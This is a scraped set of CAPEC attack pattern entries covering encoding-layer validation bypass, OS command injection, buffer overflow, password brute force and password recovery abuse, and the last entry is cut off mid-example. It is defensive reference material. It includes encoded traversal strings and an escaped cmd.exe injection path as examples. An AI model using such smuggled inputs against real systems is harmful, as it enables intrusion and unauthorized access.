| Chiradeep B. Chhaya | Cigital, Inc | 2007-02-23 | Fleshed out pattern with extra content | | Eugene Lebanidze | Cigital, Inc | 2007-02-27 | Added new examples and other content | | Richard Struse | VOXEM, Inc | 2007-03-26 | Review and feedback leading to changes in Solutions and Related Attack Patterns | | Sean Barnum | Cigital, Inc | 2007-04-13 | Modified pattern content according to review and feedback | | Amit Sethi | Cigital, Inc. | 2007-10-29 | Added extended Attack Execution Flow |
|
| Attack Pattern ID | Pattern Abstraction: Standard 43 | | Typical Severity | High | | Description | Summary An attacker supplies the target software with input data that contains sequences of special characters designed to bypass input validation logic. This exploit relies on the target making multiples passes over the input data and processing a "layer" of special characters with each pass. In this manner, the attacker can disguise input that would otherwise be rejected as invalid by concealing it with layers of special/escape characters that are stripped off by subsequent processing steps.
The goal is to first discover cases where the input validation layer executes before one or more parsing layers. That is, user input may go through the following logic in an application: <parser1> --> <input validator> --> <parser2>. In such cases, the attacker will need to provide input that will pass through the input validator, but after passing through parser2, will be converted into something that the input validator was supposed to stop. Attack Execution Flow Explore Determine application/system inputs where bypassing input validation is desired: The attacker first needs to determine all of the application's/system's inputs where input validation is being performed and where he/she wants to bypass it. | Attack Step
Technique |
|---|
| Description | Environments |
|---|
| While using an application/system, the attacker discovers an input where validation is stopping him/her from performing some malicious or unauthorized actions. | env-All |
| Indicator of
Susceptibility |
|---|
| ID | Type | Description | Environments |
|---|
| c42s1i1 | Positive | When provided with unexpected input, application provides an error message stating that the input was invalid or that access was denied. | env-All |
Experiment Determine which character encodings are accepted by the application/system: The attacker then needs to provide various character encodings to the application/system and determine which ones are accepted. The attacker will need to observe the application's/system's response to the encoded data to determine whether the data was interpreted properly. | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Determine which escape characters are accepted by the application/system. A common escape character is the backslash character, '\' | env-All | | Determine whether URL encoding is accepted by the application/system. | env-All | | Determine whether UTF-8 encoding is accepted by the application/system. | env-All | | Determine whether UTF-16 encoding is accepted by the application/system. | env-All | | Determine if any other encodings are accepted by the application/system. | env-All |
| Indicator of
Susceptibility |
|---|
| ID | Type | Description | Environments |
|---|
| c42s2i1 | Positive | System provides error message similar to the one it provided when a positivie indicator was received for the first step. | env-All |
| Outcomes |
|---|
| ID | Type | Description |
|---|
| c42s2o1 | Success | Application/system accepts at least one high level character encoding where characters can be represented with multiple ASCII characters. | | c42s2o2 | Failure | Application/system interprets each character separately. |
| Security
Control |
|---|
| ID | Type | Description |
|---|
| c42s2sc1 | Detective | Detect and alert on appearance of encodings in log messages (e.g. "Unsuccessful login by <joe") |
Combine multiple encodings accepted by the application.: The attacker now combines encodings accepted by the application. The attacker may combine different encodings or apply the same encoding multiple times. | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Combine same encoding multiple times and observe its effects. For example, if special characters are encoded with a leading backslash, then the following encoding may be accepted by the application/system: "\\\.". With two parsing layers, this may get converted to "\." after the first parsing layer, and then, to "." after the second. If the input validation layer is between the two parsing layers, then "\\\.\\\." might pass a test for ".." but still get converted to ".." afterwards. This may enable directory traversal attacks. | env-All | | Combine multiple encodings and observe the effects. For example, the attacker might encode "." as "\.", and then, encode "\." as "\.", and then, encode that using URL encoding to "%26%2392%3B%26%2346%3B" | env-All |
| Indicator of
Susceptibility |
|---|
| ID | Type | Description | Environments |
|---|
| c42s3i1 | Positive | Application/System interprets the multiple encodings properly. | env-All |
| Outcome |
|---|
| ID | Type | Description |
|---|
| c42s3o1 | Success | Attacker bypasses input validation layer(s) and passes data to application that it does not expect. |
| Security
Controls |
|---|
| ID | Type | Description |
|---|
| c42s3sc1 | Preventative | Ensure that the input validation layer is executed after as many parsing layers as possible. | | c42s3sc2 | Preventative | Determine the details of any parsing layers that get executed after the input validation layer (this may be necessary in the case of filesystem access, for example, where the operating system also includes a parsing layer), and ensure that the input validator accounts for the various encodings of illegal characters and character sequences in those layers. |
Exploit Leverage ability to bypass input validation: Attacker leverages his ability to bypass input validation to gain unauthorized access to system. There are many attacks possible, and a few examples are mentioned here. | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Gain access to sensitive files. | env-All | | Perform command injection. | env-All | | Perform SQL injection. | env-All | | Perform XSS attacks. | env-All |
| Indicators of
Susceptibility |
|---|
| ID | Type | Description | Environments |
|---|
| c42s4i1 | Positive | Success outcome in previous step | env-All | | c42s4i2 | Negative | Failure outcome in previous step | env-All |
| Outcome |
|---|
| ID | Type | Description |
|---|
| c42s4o1 | Success | Gaining unauthorized access to system functionality. |
| | Attack Prerequisites | User input is used to construct a command to be executed on the target system or as part of the file name. Multiple parser passes are performed on the data supplied by the user. | | Typical Likelihood of Exploit |
Medium
| | Methods of Attack | - Injection
- Modification of Resources
| | Examples-Instances | Description Using Escapes
The backslash character provides a good example of the multiple-parser issue. A backslash is used to escape characters in strings, but is also used to delimit directories on the NT file system. When performing a command injection that includes NT paths, there is usually a need to "double escape" the backslash. In some cases, a quadruple escape is necessary.
Original String: C:\\\\winnt\\\\system32\\\\cmd.exe /c
<parsing layer>
Interim String: C:\\winnt\\system32\\cmd.exe /c
<parsing layer>
Final String: C:\winnt\system32\cmd.exe /c
This diagram shows each successive layer of parsing translating the backslash character. A double backslash becomes a single as it is parsed. By using quadruple backslashes, the attacker is able to control the result in the final string.
From G. Hoglund and G. McGraw. Exploiting Software: How to Break Code. Addison-Wesley, February 2004. | | Attacker Skill or Knowledge Required | Medium | | Probing Techniques | Initially a fuzzer can be used to see what the application is successfully and escaping and what causes problems. This may be a good starting point. Manually try to introduce multiple layers of control characters and see how many layers the application can escape. | | Indicators-Warnings of Attack | Control characters are being detected by the filters repeatedly. | | Solutions and Mitigations | An iterative approach to input validation may be required to ensure that no dangerous characters are present. It may be necessary to implement redundant checking across different input validation layers. Ensure that invalid data is rejected as soon as possible and do not continue to work with it. Make sure to perform input validation on canonicalized data (i.e. data that is data in its most standard form). This will help avoid tricky encodings getting past the filters. Assume all input is malicious. Create a white list that defines all valid input to the software system based on the requirements specifications. Input that does not match against the white list should not be permitted to enter into the system. | | Attack Motivation-Consequences | - Data Modification
- Privilege Escalation
- Information Leakage
| | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 171 | Cleansing, Canonicalization, and Comparison Errors | Targeted | | 179 | Incorrect Behavior Order: Early Validation | Targeted | | 181 | Incorrect Behavior Order: Validate Before Filter | Targeted | | 184 | Incomplete Blacklist | Targeted | | 183 | Permissive Whitelist | Targeted | | 77 | Failure to Sanitize Data into a Control Plane (aka 'Command Injection') | Targeted | | 78 | Failure to Preserve OS Command Structure (aka 'OS Command Injection') | Targeted | | 74 | Failure to Sanitize Data into a Different Plane (aka 'Injection') | Targeted | | 20 | Improper Input Validation | Targeted | | 697 | Insufficient Comparison | Targeted | | 707 | Failure to Enforce that Messages or Data are Well-Formed | Targeted |
| | Related Security Principles | | | Purpose | Penetration | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| Medium | High | High |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| All | All | All | All |
| | References | G. Hoglund and G. McGraw. Exploiting Software: How to Break Code. Addison-Wesley, February 2004. CWE - Input Validation | | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| G. Hoglund and G. McGraw. Exploiting Software: How to Break Code. Addison-Wesley, February 2004. | Cigital, Inc | 2007-03-01 | |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Eugene Lebanidze | Cigital, Inc | 2007-02-26 | Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" | | Sean Barnum | Cigital, Inc | 2007-03-05 | Review and revise | | Richard Struse | VOXEM, Inc | 2007-03-26 | Review and feedback leading to changes in Name and Description | | Sean Barnum | Cigital, Inc | 2007-04-13 | Modified pattern content according to review and feedback | | Amit Sethi | Cigital, Inc. | 2007-10-29 | Added extended Attack Execution Flow |
|
| Attack Pattern ID | Pattern Abstraction: Standard 88 | | Typical Severity | High | | Description | Summary An attacker can leverage OS command injection in an application to elevate privileges, execute arbitrary commands and compromise the underlying operating system. Attack Execution Flow Explore Identify inputs for OS commands: The attacker determines user controllable input that gets passed as part of a command to the underlying operating system. | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports. | env-Local env-CommProtocol env-Peer2Peer env-ClientServer | | TCP/IP Fingerprinting. The attacker uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, he attempts to guess the actual operating system. | env-Embedded env-ClientServer env-Peer2Peer env-CommProtocol env-Web | | Induce errors to find informative error messages | env-All |
| Indicator of
Susceptibility |
|---|
| ID | Type | Description | Environments |
|---|
| c88s1i1 | Positive | The target software accepts connections via the network. | env-Web env-CommProtocol env-Peer2Peer env-Embedded env-ClientServer |
| Outcomes |
|---|
| ID | Type | Description |
|---|
| c88s1o1 | Success | Operating environment (operating system, language, and/or middleware) is correctly identified. | | c88s1o2 | Inconclusive | Multiple candidate operating environments are suggested. |
| Security
Controls |
|---|
| ID | Type | Description |
|---|
| c88s1s1 | Preventative | Provide misleading information on TCIP/IP fingerprints (some operating systems can be configured to send signatures that match other operating systems). | | c88s1s2 | Preventative | Provide misleading information at the server level (e.g., Apache, IIS, WebLogic, etc.) to announce a different server software. | | c88s1s3 | Detective | Some fingerprinting techniques can be detected by operating systems or by network IDS systems because they leave the network connection half-open, or they do not belong to a valid, open connection. |
Survey the Application: The attacker surveys the target application, possibly as a valid and authenticated user | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Spidering web sites for all available links | env-Web | | Inventory all application inputs | env-All |
| Indicator of
Susceptibility |
|---|
| ID | Type | Description | Environments |
|---|
| c88s2i1 | Positive | Attacker develops a list of valid inputs | env-All |
| Outcome |
|---|
| ID | Type | Description |
|---|
| c88s2o1 | Success | The attacker develops a list of likely command delimiters. |
| Security
Controls |
|---|
| ID | Type | Description |
|---|
| c88s2s1 | Detective | Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). | | c88s2s2 | Detective | Create links on some pages that are visually hidden from web browsers. Using IFRAMES, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application. | | c88s2s3 | Preventative | Actively monitor the application and either deny or redirect requests from origins that appear to be automated. | | c88s2s4 | Detective | Monitor velocity of feature activations (non-web software). Humans who activate features (click buttons, request actions, invoke APIs, etc.) will do so far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). |
Experiment Vary inputs, looking for malicious results.: Depending on whether the application being exploited is a remote or local one the attacker crafts the appropriate malicious input, containing OS commands, to be passed to the application | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Inject command delimiters using network packet injection tools (netcat, nemesis, etc.) | env-CommProtocol env-Web env-Peer2Peer env-ClientServer | | Inject command delimiters using web test frameworks (proxies, TamperData, custom programs, etc.) | env-Web |
| Indicator of
Susceptibility |
|---|
| ID | Type | Description | Environments |
|---|
| c88s3i1 | Positive | Inventorying in prior step is successful. | env-All |
| Outcome |
|---|
| ID | Type | Description |
|---|
| c88s3o1 | Success | One or more injections that are appropriate to the platform provokes an unexpected response from the software, which can be varied by the attacker based on the input. |
Exploit Execute malicious commands: The attacker may steal information, install a back door access mechanism, elevate privileges or compromise the system in some other way. | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| The attacker executes a command that stores sensitive information into a location where he can retrieve it later (perhaps using a different command injection). | env-All | | The attacker executes a command that stores sensitive information into a location where he can retrieve it later (perhaps using a different command injection). | env-All | | The attacker executes a command that stores sensitive information into a location where he can retrieve it later (perhaps using a different command injection). | env-All |
| Outcome |
|---|
| ID | Type | Description |
|---|
| c88s4o1 | Success | The software performs an action the attacker desires. This might be displaying information, storing a program, executing a command, or some other malicious activity. |
| Security
Controls |
|---|
| ID | Type | Description |
|---|
| c88s4s1 | Preventative | Make commonly exploited administrative tools log their execution. | | c88s4s2 | Preventative | Make commonly exploited administrative tools non-executable, except when the system is in specific maintenance periods. (i.e., require administrators to specifically enable certain administrative commands prior to performing system maintenance.) |
| | Attack Prerequisites | User controllable input used as part of commands to the underlying operating system. | | Typical Likelihood of Exploit |
High
There is high motivation for the attacker to seek out and discover opportunities for this attack due to the power it yields.
| | Methods of Attack | | | Examples-Instances | Description A transaction processing system relies on code written in a number of languages. To access this functionality, the system passes transaction information on the system command line.
An attacker can gain access to the system command line and execute malicious commands by injecting these commands in the transaction data. If successful, the attacker can steal information, install backdoors and perform other nefarious activities that can compromise the system and its data. Related Vulnerability A vulnerability in Mozilla Firefox 1.x browser allows an attacker to execute arbitrary commands on the UNIX/Linux operating system.
The vulnerability is caused due to the shell script used to launch Firefox parsing shell commands that are enclosed within backticks in the URL provided via the command line.
This can be exploited to execute arbitrary shell commands by tricking a user into following a malicious link in an external application which uses Firefox as the default browser (e.g. the mail client Evolution on Red Hat Enterprise Linux 4).
| | Attacker Skill or Knowledge Required | High: The attacker needs to have knowledge of not only the application to exploit but also the exact nature of commands that pertain to the target operating system. This may involve, though not always, knowledge of specific assembly commands for the platform. | | Solutions and Mitigations | Use language APIs rather than relying on passing data to the oeprating system shell or command line. Doing so ensures that the available protection mechanisms in the language are intact and applicable. Filter all incoming data to escape or remove characters or strings that can be potentially misinterpreted as operating system or shell commands All application processes should be run with the minimal privileges required. Also, processes must shed privileges as soon as they no longer require them. | | Attack Motivation-Consequences | - Run Arbitrary Code
- Privilege Escalation
- Information Leakage
| | Context Description | Most modern applications are written using the J2EE or .NET managed platforms. These platforms provide fairly robust mechanism to protect against code inadvertently accessing parts of the underlying system that it should not.
However, two chief factors mitigate against the eradication of OS command injection. The first one relates to the use of native code and libraries. The only way for any managed platform to access this functionality is by calling into the underlying operating system.
The second factor relates to the prevalence of unmanaged code, such as PERL code, used to create application. PERL, for example, is the language of choice when programming using CGI. PERL is unmanaged and allows easy mechanisms for the programmer to call the underlying operating system commands.
This problem is exacerbated by the fact that such calls into the oeprating system are made with far higher privileges than required, thus leading to additional damage.
Since input validation is an art not yet perfected, opportunities abound for attackers to abuse applications and execute commands on the underlying operating system. | | Injection Vector | User-controllable input used as part of operating system commands | | Payload | Operating system commands injected by the attacker, intended to escalate privilege or divulge information | | Activation Zone | Underlying operating system hosting the exploited application. | | Payload Activation Impact | The injected OS commands are interpreted by the shell, causing them to be executed under the privileges of the process running the exploited application. | | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 78 | Failure to Preserve OS Command Structure (aka 'OS Command Injection') | Targeted | | 88 | Argument Injection or Modification | Secondary | | 20 | Improper Input Validation | Secondary | | 697 | Insufficient Comparison | Targeted | | 713 | OWASP Top Ten 2007 Category A2 - Injection Flaws | Targeted |
| | Related Security Principles | - Least Privilege
- Reluctance To Trust
| | Related Guidelines | - Never Use Unvalidated Input as Part of a Directive to any Internal Component
| | Purpose | Penetration Exploitation | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| High | High | High |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| All | All | All | All |
| | References | Secunia Advisory SA16869: Firefox Command Line URL Shell Command Injection | | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| Chiradeep B. Chhaya | | 2007-03-16 | First Draft |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Sean Barnum | Cigital, Inc | 2007-04-16 | Review and revise |
|
| Attack Pattern ID | Pattern Abstraction: Standard 100 | | Typical Severity | Very High | | Description | Summary Buffer Overflow attacks target improper or missing bounds checking on buffer operations, typically triggered by input injected by an attacker. As a consequence, an attacker is able to write past the boundaries of allocated buffer regions in memory, causing a program crash or potentially redirection of execution as per the attacker's choice. Attack Execution Flow The attacker identifies a buffer to target. Buffer regions are either allotted on the stack or the heap, and the exact nature of attack would vary depending on the location of the buffer Next, the attacker identifies an injection vector to deliver the excessive content to the targeted buffer. The attacker crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the attacker will craft a set of content that not only overflows the targeted buffer but does so in such a way that the overwritten return address is replaced with one of the attacker's choosing which points to code injected by the attacker. The attacker injects the content into the targeted software. Upon successful exploitation, the system either crashes or control of the program is returned to a location of the attacker's choice. This can result in execution of arbitrary code or escalated privileges, depending upon the exploited target.
| | Attack Prerequisites | Targeted software performs buffer operations. Targeted software inadequately performs bounds-checking on buffer operations. Attacker has the capability to influence the input to buffer operations. | | Typical Likelihood of Exploit |
High
| | Methods of Attack | | | Examples-Instances | Description The most straightforward example is an application that reads in input from the user and stores it in an internal buffer but does not check that the size of the input data is less than or equal to the size of the buffer. If the user enters excessive length data, the buffer may overflow leading to the application crashing, or worse, enabling the user to cause execution of injected code. Description Many web servers enforce security in web applications through the use of filter plugins. An example is the SiteMinder plugin used for authentication. An overflow in such a plugin, possibly through a long URL or redirect parameter, can allow an attacker not only to bypass the security checks but also execute arbitrary code on the target web server in the context of the user that runs the web server process. | | Attacker Skill or Knowledge Required | Low: In most cases, overflowing a buffer does not require advanced skills beyond the ability to notice an overflow and stuff an input variable with content.
High: In cases of directed overflows, where the motive is to divert the flow of the program or application as per the attacker's bidding, high level skills are required. This may involve detailed knowledge of the target system architecture and kernel. | | Resources Required | None: Detecting and exploiting a buffer overflow does not require any resources beyond knowledge of and access to the target system. | | Probing Techniques | The attacker sends in overtly long input in variables under his control. If the target system or application handles it gracefully, the attack becomes difficult. However, an error condition or a system crash point to a high likelihood of successful exploitation. In cases where the attack is directed at a particular system or application, such as an operating system or a web server, the attacker can refer to system architecture and design documentation to figure out the exact point of injection and exploitation. | | Indicators-Warnings of Attack | An attack designed to leverage a buffer overflow and redirect execution as per the attacker's bidding is fairly difficult to detect. An attack aimed solely at bringing the system down is usually preceded by a barrage of long inputs that make no sense. In either case, it is likely that the attacker would have resorted to a few hit-or-miss attempts that will be recorded in the system event logs, if they exist. | | Obfuscation Techniques | A buffer overflow attack itself is pretty difficult to obfuscate. There, however, exist fairly advanced techniques to ofuscate the payload, in order to bypass an intrusion detection system or filtering, either in the application or by means of an application firewall of some sorts. | | Solutions and Mitigations | Use a language or compiler that performs automatic bounds checking. Use secure functions not vulnerable to buffer overflow. If you have to use dangerous functions, make sure that you do boundary checking. Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution. Use OS-level preventative functionality. Not a complete solution. Utilize static source code analysis tools to identify potential buffer overflow weaknesses in the software. | | Attack Motivation-Consequences | - Denial of Service
- Run Arbitrary Code
- Privilege Escalation
| | Context Description | Every program or application is designed to process some inputs received from the user or another system. Buffer overflows abound because programs trust user-controlled input.
A buffer is a region of memory allocated for the purposes of storing certain data values. These can be environment variables, user-suppplied input or temporary scratch space. These regions are allocated on a stack (static allocation) or a heap (dynamic allocation). Although the exact payload used to exploit an overflow in buffers allocated on the stack or heap differ, the general technique is to stuff an input variable with more data than expected.
Managed environments, such as the Java language or the .NET platform enforce strict type and bounds checking. This means that an attempt at a buffer overflow results in a system error. Note that this protection does not make application secure; it makes exploitation of overflow conditions more difficult than in application written in umanaged languages, such as C and C++. For example, the Structured Exception Handling mechanism technically allows an application to perform certain actions before the process is shut down. In case of a buffer overflow, this can be used to close sensitive files or disable certain functionality. However, it is possible to abuse the SEH mechanism as well and execute a successful buffer overflow exploit; only the effort and technical knowledge required are far greater than average. Therefore, it still remains the developer's and designer's prerogative to design a system in such a way that no overflow conditions exist. | | Injection Vector | User-controllable input. Usually, any input that a user can control is prone to exploitation by overflow. | | Payload | Malicious content, such as an overtly long input string, system shellcode or commands, intended to cause a system crash and denial of service, or to escalate privilege or execute code that results in information disclosure or system compromise. | | Activation Zone | Buffer allocated in memory for the input that carried the payload. | | Payload Activation Impact | Denial of service, escalated privileges, execution of arbitrary code, including system commands and low-level assembly code. | | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 120 | Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') | Targeted | | 119 | Failure to Constrain Operations within the Bounds of a Memory Buffer | Secondary | | 19 | Data Handling | Secondary | | 680 | Integer Overflow to Buffer Overflow | Targeted |
| | Related Vulnerabilities | | Vulnerability-ID | Vulnerability Description |
|---|
| CVE-2007-2139 | Multiple stack-based buffer overflows in the SUN RPC service in CA (formerly Computer Associates) BrightStor ARCserve Media Server, as used in BrightStor ARCserve Backup 9.01 through 11.5 SP2, BrightStor Enterprise Backup 10.5, Server Protection Suite 2, and Business Protection Suite 2, allow remote attackers to execute arbitrary code via malformed RPC strings. | | CVE-2007-1910 | Buffer overflow in wwlib.dll in Microsoft Word 2007 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted document |
| | Related Attack Patterns | | ID | Name | Relationship Type | Relationship Description |
|---|
| 8 | Buffer Overflow in an API Call | More Abstract | | | 9 | Buffer Overflow in Local Command-Line Utilities | More Abstract | | | 10 | Buffer Overflow via Environment Variables | More Abstract | | | 24 | Filter Failure through Buffer Overflow | Occasionally Precedes | | | 46 | Overflow Variables and Tags | More Abstract | | | 47 | Buffer Overflow via Parameter Expansion | More Abstract | |
| | Relevant Security Requirements | All user-controllable input must be strictly validated for enforcement of length and semantic checks All exception conditions (such as ArrayIndexOutOfBounds) in applications must be gracefully handled through use of available exception handling mechanisms. All applications and processes must be run with minimum privileges necessary so as to avoid an escalation of privilege in case of a successful exploit. | | Related Security Principles | - Reluctance To Trust
- Defense in Depth
- Failing Securely
| | Related Guidelines | - Ensure that the Bounds of No Memory Region Are Violated
- Never Use Unvalidated Input as Part of a Directive to any Internal Component
| | Purpose | Penetration Exploitation | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| High | High | High |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| All | | All | AJAX |
| | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| Chiradeep B. Chhaya | | 2007-04-30 | First Draft |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Sean Barnum | Cigital, Inc | 2007-05-02 | Review and revise |
|
| Attack Pattern ID | Pattern Abstraction: Standard 49 | | Typical Severity | High | | Description | Summary In this attack, the attacker tries every possible value for a password until they succeed. A brute force attack, if feasible computationally, will always be successful because it will essentially go through all possible passwords given the alphabet used (lower case letters, upper case letters, numbers, symbols, etc.) and the maximum length of the password.
A system will be particularly vulnerable to this type of an attack if it does not have a proper enforcement mechanism in place to ensure that passwords selected by users are strong passwords that comply with an adequate password policy.
In practice a pure brute force attack on passwords is rarely used, unless the password is suspected to be weak. Other password cracking methods exist that are far more effective (e.g. dictionary attacks, rainbow tables, etc.). Attack Execution Flow Explore Determine application's/system's password policy: Determine the password policies of the target application/system. | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Determine minimum and maximum allowed password lengths. | env-All | | Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc.). | env-All | | Determine account lockout policy (a strict account lockout policy will prevent brute force attacks). | env-All |
| Indicators of
Susceptibility |
|---|
| ID | Type | Description | Environments |
|---|
| c49s1i1 | Positive | Passwords are used in the application/system | env-All | | c49s1i2 | Inconclusive | Passwords are not used for authentication; however, brute forcing of other protection mechanisms may also be possible. | env-All |
Exploit Brute force password: Given the finite space of possible passwords dictated by the password policy determined in the previous step, try all possible passwords for a known user ID until application/system grants access. | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Manually or automatically enter all possible passwords through the application/system's interface. In most systems, start with the shortest and simplest possible passwords, because most users tend to select such passwords if allowed to do so. | env-All | | Perform an offline dictionary attack or a rainbow table attack against a known password hash. | env-All |
| Indicators of
Susceptibility |
|---|
| ID | Type | Description | Environments |
|---|
| c49s2i1 | Positive | Weak passwords allowed, and no account lockout policy enforced. | env-All | | c49s2i2 | Positive | Password hashes can be captured by attacker. | env-All | | c49s2i3 | Negative | Accounts locked out after small number of failed authentication attempts. | env-All |
| Outcomes |
|---|
| ID | Type | Description |
|---|
| c49s2o1 | Success | Attacker determines correct password for a user ID and obtains access to application or system. | | c49s2o2 | Failure | Attacker is unable to determine correct password for a user ID and obtain access to application or system. | | c49s2o3 | Failure | Attacker locks out account while attempting to brute force its password. |
| Security
Controls |
|---|
| ID | Type | Description |
|---|
| c49s2sc1 | Detective | Large number of authentication failures in logs. | | c49s2sc2 | Preventative | Enforce strict account lockout policies. | | c49s2sc3 | Preventative | Enforce strong passwords (having sufficient length and containing mix of lower case and upper case letters, numbers, and special characters) | | c49s2sc4 | Corrective | Deny login attempts from sources that produce too many failed attempts. Note that this may cause problems where many users may have the same "source" as far as the application/system is concerned (e.g. a lot of users behind a NAT device). |
| | Attack Prerequisites | An attacker needs to know a username to target. The system uses password based authentication as the one factor authentication mechanism. An application does not have a password throttling mechanism in place. A good password throttling mechanism will make it almost impossible computationally to brute force a password as it may either lock out the user after a certain number of incorrect attempts or introduce time out periods. Both of these would make a brute force attack impractical. | | Typical Likelihood of Exploit |
Medium
| | Methods of Attack | | | Examples-Instances | Description A system does not enforce a strong password policy and the user picks a five letter password consisting of lower case english letters only. The system does not implement any password throttling mechanism. Assuming the attacker does not know the length of the users' password, an attacker can brute force this password in maximum 1+26+26^2+26^3+26^4+26^5 = 1 + 26 + 676 + 17576 + 456976 + 11,881,376 = 12,356,631 attempts, and half these tries (6,178,316) on average. Using modern hardware this attack is trivial. If the attacker were to assume that the user password could also contain upper case letters (and it was case sensitive) and/or numbers, than the number of trials would have been larger.
An attacker's job would' have most likely been even easier because many users who choose easy to brute force passwords like this are also likely to use a word that can be found in the dictionary. Since there are far fewer valid english words containing up to five letters than 12,356,631, an attack that tries each of the entries in the english dictionary would go even faster. Description A weakness exists in the automatic password generation routine of Mailman prior to 2.1.5 that causes only about five million different passwords to be generated. This makes it easy to brute force the password for all users who decided to let Mailman automatically generate their passwords for them. Users who chose their own passwords during the sign up process would not have been affected (assuming that they chose strong passwords). Related Vulnerability | | Attacker Skill or Knowledge Required | Low: A brute force attack is very straightforward. A variety of password cracking tools are widely available. | | Resources Required | A powerful enough computer for the job with sufficient CPU, RAM and HD. Exact requirements will depend on the size of the brute force job and the time requirement for completion. Some brute forcing jobs may require grid or distributed computing (e.g. DES Challenge). | | Indicators-Warnings of Attack | Many incorrect login attempts are detected by the system. | | Obfuscation Techniques | Try to spoof IP addresses so that it does not look like the incorrect log in attempts are coming from the same computer. | | Solutions and Mitigations | Implement a password throttling mechanism. This mechanism should take into account both the IP address and the log in name of the user. Put together a strong password policy and make sure that all user created passwords comply with it. Alternatively automatically generate strong passwords for users. Passwords need to be recycled to prevent aging, that is every once in a while a new password must be chosen. | | Attack Motivation-Consequences | | | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 521 | Weak Password Requirements | Targeted | | 262 | Not Using Password Aging | Targeted | | 263 | Password Aging with Long Expiration | Targeted | | 257 | Storing Passwords in a Recoverable Format | Targeted | | 693 | Protection Mechanism Failure | Targeted |
| | Related Attack Patterns | | ID | Name | Relationship Type | Relationship Description |
|---|
| 16 | Dictionary-based Password Attack | More Detailed | | | 70 | Try Common(default) Usernames and Passwords | More Detailed | | | 55 | Rainbow Table Password Cracking | Occasionally Follows | |
| | Purpose | Penetration | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| High | High | Low |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| All | All | All | All |
| | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| Eugene Lebanidze | Cigital, Inc | 2007-02-26 | |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Sean Barnum | Cigital, Inc | 2007-03-01 | Review and revision of content | | Richard Struse | VOXEM, Inc | 2007-03-26 | Review and feedback leading to changes in Description and Related Attack Patterns | | Sean Barnum | Cigital, Inc | 2007-04-13 | Modified pattern content according to review and feedback | | Amit Sethi | Cigital, Inc. | 2007-10-29 | Added extended Attack Execution Flow |
|
| Attack Pattern ID | Pattern Abstraction: Standard 50 | | Typical Severity | High | | Description | Summary An attacker may take advantage of the application feature to help users recover their forgotten passwords in order to gain access into the system with the same privileges as the original user. Generally password recovery schemes tend to be weak and insecure. Most of them use only one security question . For instance, mother's maiden name tends to be a fairly popular one. Unfortunately in many cases this information is not very hard to find, especially if the attacker knows the legitimate user.
These generic security questions are also re-used across many applications, thus making them even more insecure. An attacker could for instance overhear a coworker talking to a bank representative at the work place and supplying their mother's maiden name for verification purposes. An attacker can then try to log in into one of the victim's accounts, click on "forgot password" and there is a good chance that the security question there will be to provide mother's maden name.
A weak password recovery scheme totally undermines the effectiveness of a strong password scheme. Attack Execution Flow Understand the password recovery mechanism and how it works. Find a weakness in the password recovery mechanism and exploit it. For instance, a weakness may be that a standard single security question is used with an easy to determine answer.
| | Attack Prerequisites | The system allows users to recover their passwords and gain access back into the system. Password recovery mechanism has been designed or implemented insecurely. Password recovery mechanism relies only on something the user knows and not something the user has. No third party intervention is required to use the password recovery mechanism. | | Typical Likelihood of Exploit |
Medium
| | Methods of Attack | - Brute Force
- API Abuse
- Injection
| | Examples-Instances | Description An attacker clicks on the "forgot password" and is presented with a single security question. The question is regarding the name of the first dog of the user. The system does not limit the number of attempts to provide the dog's name. An attacker goes through a list of 100 most popular dog names and finds the right name, thus getting the ability to reset the password and access the system. Description phpBanner Exchange is a PHP script (using the mySQL database) that facilitates the running of a banner exchange without extensive knowledge of PHP or mySQL.
